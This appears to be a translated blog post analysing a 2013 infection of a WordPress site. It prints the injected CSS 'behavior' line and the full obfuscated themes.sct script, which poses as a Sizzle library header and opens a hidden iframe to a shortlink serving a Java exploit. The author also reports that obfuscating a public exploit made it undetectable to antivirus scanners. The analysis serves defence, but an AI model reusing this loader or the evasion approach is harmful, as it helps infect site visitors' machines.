Back to Home

Infection on the site - an example of history

viruses on websites · exploit · website security · viruses · 0-day

Infection on the site - an example of history

image
Injecting malicious code into WordPress ( image source )


This story begins between 03/28/2013 and 04/04/2013. During this period, the site ******. Ru was infected. This can be well tracked by archive.org. The following line appears in the page code.




If you open this css at that time, then the path to the other side of the Internet begins.

body {
behavior:url(http://******.ru/wp-content/wp-content/themes.sct);
}


Here is the almost unchanged themes.sct file.

/*
 * Sizzle CSS Selector Engine - v0.9.3
 *  Copyright 2009, The Dojo Foundation
 *  Released under the MIT, BSD, and GPL Licenses.
 *  More information: http://sizzlejs.com/
 */
/* This file create by Cms. Don't delete it!
*/
xchk='_';xurl='\x08//goo.gl/1JvYY';(xifr=document.createElement('iframe')).style.display='none';doсument.body.appendChild(xifr);with(xifr){id='xfid';addBehavior('#default#userData');load(xchk);if(!getAttribute(xchk)){setAttribute(xchk,'_');save(xchk);expires=(new Date((new Date()).getTime()+6e8)).toUTCString();src=xurl;}}


Googling on this “miracle”, at least for me, yielded nothing. When copying the code to a * .htc file, the operation was not observed. It is possible that this is 0-day. Performance tested on IE7-8. The link goo.gl/1JvYY leads to justhaveown.myvnc.com/prok.php. By mid-May, the link was already dead. But the attacker had at least 45 days and an audience of 9,000 unique visitors per day to fulfill his plan. In addition, there is a possibility of using a filter by provider, country, etc.

Some information on the downloadable module was found here , if not available, then the cache . The result was a BBfrtY.jar file, which, according to Microsoft's classification, turned out to be Exploit: Java / CVE-2013-0422. According to securelist.com, then the epidemic began in mid-January. Moreover, signs of infection of the site with a virus three months ago were not registered by the site administration for at least a month and a half. By signs, I mean the presence of a foreign themes.sct file in the site directory. According to archive.org, the traces of the virus’s stay were finally removed after the first days of August. It’s hard to say more precisely, since archive.org does not have snapshots after this date.

Unfortunately, this is a very typical story. Even if large portals can hostthe virus is several hours or even days. The author personally observed such viral activity in early summer, on the website of the news media, which has an attendance of 300-400 thousand users per day and the portal of a large radio station with 100 thousand users. Small sites may not even know that they had something.

To test how real and repeatable this situation is now, CVE-2012-4681 was chosen and the code from here . ProGuard 4.10 and the themes.sct file were also taken.

Test results for virustotal:

That is, even now, six months after the publication of PoC, only 36% of antiviruses consider the current java exploit a threat. And after obfuscation, this figure drops to zero. By the way, I have big doubts that some packer / protector will be able to achieve such results for PE files. The consequences of decades of struggle make themselves felt.

It turns out that on the one hand there is an insufficient audit of file integrity, database or password strength, and sometimes simply: “ Thank you, we'll figure it out on Monday .” On the other hand, the lack of readiness of the “shield” for new threats.
All links and files used in the article can be provided by private messages or if the community considers their publication appropriate.

Read Next